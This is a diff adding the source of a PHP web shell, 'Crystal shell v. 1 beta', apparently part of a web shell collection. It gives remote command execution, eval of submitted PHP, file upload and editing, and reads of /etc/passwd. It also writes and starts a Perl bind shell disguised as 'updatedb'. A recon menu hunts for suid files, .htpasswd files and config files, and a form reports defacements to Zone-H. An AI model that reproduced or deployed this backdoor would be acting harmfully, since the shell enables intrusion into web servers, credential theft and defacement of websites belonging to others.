+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='file' name='fileup' size='20'>
+<input type='submit' value='  up  '>
+</form>
+<form method='POST'  action='Super-Crystal.php'>
+<input type='cmd' name='cmd' size='20'>
+<input type='submit' value='  open (shill.txt) '>
+</form>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='text' name='m' size='20'>
+<input type='submit' value='  run  '>
+<input type='reset' value=' reset '>
+</form>
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "<br>";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
+echo "</pre>";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>saved -OK!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
+
+
+Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"..Exec..\"></form>";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
+Including from here: "
+. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
+
+
+
+
+?>
+
+
+</td></tr></table></p></td></tr></table>
+	</a><br><hr size="1" noshade><p align="right">
+	<font face="Wingdings 3" size="5" color="#DCE7EF">&lt;</font><b><select name="act"><option value="ls">
+	With selected:</option><option value="delete">Delete</option><option value="archive">
+	Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect">
+	Unselect</option></select>&nbsp;<input type="submit" value="Confirm"></p></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
+	<b>
+	:: </b>
+	<font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
+	<?
+	echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
+?>
+		<input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
+	&nbsp;</p>
+	</td>
+	<td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
+	<form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
+		<font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
+		-----------------------------------------------------------</option>
+		<option value="ls -la /var/lib/mysq">ls MySQL</option>
+		<option value="which curl">cURL ?</option>
+		<option value="which wget">Wget ?</option>
+		<option value="which lynx">Lynx ?</option>
+		<option value="which links">links ?</option>
+		<option value="which fetch">fetch ?</option>
+		<option value="which GET">GET ?</option>
+		<option value="which per">Perl ?</option>
+		<option value="gcc --help">C gcc Help ?</option>
+		<option value="tar --help">tar Help ?</option>
+		<option value="cat /etc/passwd">Get passwd !!!</option>
+		<option value="cat /etc/hosts">Get hosts</option>
+		<option value="perl --help">Perl Help ?</option>
+		<option value="find / -type f -perm -04000 -ls">
+		find all suid files</option><option value="find . -type f -perm -04000 -ls">
+		find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
+		find all sgid files</option><option value="find . -type f -perm -02000 -ls">
+		find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
+		find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">
+		find config* files</option><option value="find . -type f -name &quot;config*&quot;">
+		find config* files in current dir</option><option value="find / -perm -2 -ls">
+		find all writable directories and files</option><option value="find . -perm -2 -ls">
+		find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
+		find all service.pwd files</option><option value="find . -type f -name service.pwd">
+		find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
+		find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
+		find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
+		find all .bash_history files</option><option value="find . -type f -name .bash_history">
+		find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
+		find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
+		find .fetchmailrc files in current dir</option><option value="lsattr -va">
+		list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
+		show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">�</font></a><font color="#00FF00"><br>
+</font>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
+	<p align="center">
+<a bookmark="minipanel">
+	<b><font face="verdana" color="red" size="4">
+	<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
+	<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
+	file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
+	&nbsp;<?
+if ($act == "edit") {echo "<center><b>������� ��������:<br><br> �� ���� ��� ����� ���� ���� ������ ���<br>���� ���� ����� ��� config.php ����<br>Edit<br>����� �� ����� ��� ������� ����� <br>����� � ��� ���� ����� ��� ��� �� ���� �� �������� <br>���� ���� ���� ������ washer-crystal.txt   </a>.</b>";}
+?>
+	</p>
+	<p>&nbsp;</p>
+	<p>	<?
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+?>
+	</p>
+	</form></center></p></td>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+                 <?
+if ($act == "upload") {echo "<center><b>��� �������:<br><br>�� ������ ����� ������ ���� <br>���� ���� �� ������ ��� ������ ������<br>UPLOAD< </a>.</b>";}
+?><a bookmark="minipanel"><b><font size="2">::
+	</font>
+	</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
+					upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
+		<?
+		echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<INPUT type=\"file\" name=\"userfile\">
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Download\"></form></div>";
+?>
+	<p></form></p></td>
+
+</tr>
+</table>	<b>
+<font size=-2 face=verdana color="white">
+                  <p>&nbsp;<a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp;
+</p>
+ 					<?
+if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>��� ������ Defacer<br>������ ������� Victim<br>��� �������� �� ��� ������ ���� ��������� Attack Mode <br> ��� �������� Attack Reason <br>������ �������� sand   <br> ����� ��� ��������� ������� ������� Attacks On Hold</a>.</b>";}
+?>                 <p align="center"><font face="Verdana" color="#CC0000">
+                  <SCRIPT language=JavaScript type=text/javascript>
+        <!--
+        function validate(){
+            document.notifyForm.action = "http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/"
+            document.notifyForm.submit();
+        }
+        //-->
+        </SCRIPT>
+
+                  Defacer </font></font></font>
+<font face=Verdana color=#CC0000>
+					Zone-h</font><FORM name=notifyForm
+                  action=http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/
+                  method=post>
+                  <TABLE class=contentpane cellSpacing=0 cellPadding=0
+                  width="100%" border=0>
+                    <TBODY>
+                    <!-- DESCRIPTION -->
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS -->
+                    </TBODY></TABLE>
+                  <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000">
+                    <TBODY>
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000">
+                        <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><!-- Input Form --><TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left width="15%"
+                              height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000">
+							::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font>
+							</font></TD>
+							<font size=-2 face=verdana color=white>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b><font size="1" color="#FF0000">::Victim::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=23>Access credentials through Man In the
+							Middle attack</OPTION><OPTION value=22>Attack
+							against the administrator/user (password
+							stealing/sniffing)</OPTION><OPTION value=29>DNS
+							attack through cache poisoning</OPTION><OPTION
+                                value=28>DNS attack through social engineering</OPTION><OPTION value=17>
+							File Inclusion</OPTION><OPTION value=9>FTP Server
+							intrusion</OPTION><OPTION value=8>Mail Server
+							intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14>
+							Other Server intrusion</OPTION><OPTION value=18>
+							Other Web Application bug</OPTION><OPTION value=19>
+							Remote administrative panel access through
+							bruteforcing</OPTION><OPTION value=20>Remote
+							administrative panel access through password
+							guessing</OPTION><OPTION value=21>Remote
+							administrative panel access through social
+							engineering</OPTION><OPTION value=25>Remote service
+							password bruteforce</OPTION><OPTION
+                                value=24>Remote service password guessing</OPTION><OPTION value=26>
+							Rerouting after attacking the Firewall</OPTION><OPTION
+                                value=27>Rerouting after attacking the Router</OPTION><OPTION value=12>
+							RPC Server intrusion</OPTION><OPTION value=13>Shares
+							misconfiguration</OPTION><OPTION value=15>SQL
+							Injection</OPTION><OPTION value=10>SSH Server
+							intrusion</OPTION><OPTION value=11>Telnet Server
+							intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7>
+							Web Server external module intrusion</OPTION><OPTION
+                                value=6>Web Server intrusion</OPTION></SELECT></TD></TR><TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=4>As a challenge</OPTION><OPTION
+                                value=1>Heh...just for fun!</OPTION><OPTION
+                                value=5>I just want to be the best defacer</OPTION><OPTION value=7>
+							Not available</OPTION><OPTION
+                                value=6>Patriotism</OPTION><OPTION
+                                value=3>Political reasons</OPTION><OPTION
+                                value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY></TABLE><TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><DIV style="CLEAR: both"></DIV>
+                        <TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000">
+							<INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp;
+							</font></font>
+<font size=6 face=Webdings color="#FF0000">L </font><b>
+							<a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,45/">
+							<font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000">
+							</font>
+<font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY></TABLE><INPUT type=hidden
+                        value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"></TR></TBODY></TABLE></FORM></font></b><br>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+	<b>
+	&nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. 1 beta&nbsp; </b><font color="#CC0000"><b>�oded by</b> </font><b><a href="http://www.tryag.com">TrYaG Team</a> <span lang="en-us">l</span></b> <b><a href="?act=team">Arab Security Center Team</a> |<a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>|
+	: Web </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">&nbsp; </span><TABLE cellSpacing=0 cellPadding=0 border=0>
+  <TBODY>
+  <TR>
+    <TD align=middle style="font-family: verdana, arial, 'ms sans serif', sans-serif; font-size: 11px; color: #D5ECF9">
+      <TABLE class=calendar_table cellSpacing=1 cellPadding=1>
+        <TBODY>
+        <TR>
+          <TD class=calendar_month colSpan=7><span lang="en-us">CRYSTAL-<font color="#CC0000">H</font></span><font color="#CC0000">
+			2006</font></TD></TR><TR>
+          <TD class=calendar_days>P</TD><TD class=calendar_days>P</TD><TD class=calendar_days>S</TD><TD class=calendar_days>C</TD><TD class=calendar_days>P</TD><TD class=calendar_days>C</TD><TD class=calendar_days>C</TD></TR><TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR>
+        <TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day>1 </TD></TR>
+        <TR>
+          <TD class=calendar_day>2 </TD>
+          <TD class=calendar_day>3 </TD>
+          <TD class=calendar_day><font color="#FF0000">4 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">5 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">6 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">7 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">8 </font> </TD></TR>
+        <TR>
+          <TD class=calendar_day>9 </TD>
+          <TD class=calendar_day><font color="#FF0000">10 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">11 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">12 </font> </TD>
+          <TD class=calendar_day>13</TD><TD class=calendar_day>14 </TD>
+          <TD class=calendar_day>15 </TD></TR>
+        <TR>
+          <TD class=calendar_day><font color="#FF0000">16 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">17 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">18</font></TD><TD class=calendar_day>19</TD><TD class=calendar_day>20 </TD>
+          <TD class=calendar_day>21 </TD>
+          <TD class=calendar_current_day>22 </TD></TR>
+        <TR>
+          <TD class=calendar_day>23</TD><TD class=calendar_day>24</TD><TD class=calendar_day>25</TD><TD class=calendar_day>26</TD><TD class=calendar_day><font color="#FF0000">27</font></TD><TD class=calendar_day><font color="#FF0000">28</font></TD><TD class=calendar_day><font color="#FF0000">29</font></TD></TR><TR>
+          <TD class=calendar_day>30</TD><TD class=calendar_day>31</TD><TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR></TBODY></TABLE></TD></TR>
+  </TBODY></TABLE>
+
+        </div>
+
+
+</body></html>
diff --git a/xakep-shells/PHP/csh.php.php.txt b/xakep-shells/PHP/csh.php.php.txt
new file mode 100644
index 0000000..e9fd664
--- /dev/null
+++ b/xakep-shells/PHP/csh.php.php.txt
